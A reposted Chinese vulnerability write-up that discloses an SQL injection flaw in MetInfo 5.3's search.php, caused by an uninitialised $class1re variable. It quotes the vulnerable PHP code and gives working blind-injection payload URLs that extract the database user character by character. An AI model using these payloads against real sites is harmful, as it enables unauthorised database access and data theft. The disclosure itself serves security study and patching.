记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

MetInfo5.3 最新版本SQL注入漏洞

2015-07-14 19:05

MetInfo5.3 最新版本SQL注入

search.php:


$module=intval($module);
if($class1)$module=0;
if(intval($module)){
$serch_sql.=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' ";
}else{
$class1_info=$class_list[$class1];
if(!$class1_info)okinfo('../',$pagelang[noid]);
$class1sql=" class1='$class1' ";
$class2sql=" class2='$class2' ";
$class3sql=" class3='$class3' ";

if($class1&&!$class2&&!$class3){
foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){
if($val['releclass']==$class1){
$class1re.=" or class1='$val[id]' ";
}
}
if($class1re){
$class1sql='('.$class1sql.$class1re.')';
}
}
if($class_list[$class2]['releclass']){
$class1sql=" class1='$class2' ";
$class2sql=" class2='$class3' ";
$class3sql="";
}
$serch_sql=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' and $class1sql ";


由于$class1re 没有进行初始化,所以全局只需要越过


foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){
if($val['releclass']==$class1){
$class1re.=" or class1='$val[id]' ";
}
}


这一条逻辑即可:发送url:http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=1&searchword=1&lang=cn&class1re=xxxxxx抓取sql语句为:2015/4/8 14:39 SELECT COUNT(*) FROM met_news where lang='cn' and (recycle='0' or recycle='-1') and displaytype='1' and ( class1='2' xxxxxx) and title like '%1%'然后进行构造http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and 1=1-- sd页面是:

http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and 1=2-- sd

payload:http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=$NUM,1,0)-- sd根据页面变化 补充$NUM来进行敏感信息猜测由于我这里是roothttp://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=114,1,0)-- sd页面里面没有xxxxxxhttp://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=1141,1,0)-- sd页面里面有xxxxx
 

知识来源: www.2cto.com/Article/201507/418160.html

阅读:99420 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“MetInfo5.3 最新版本SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云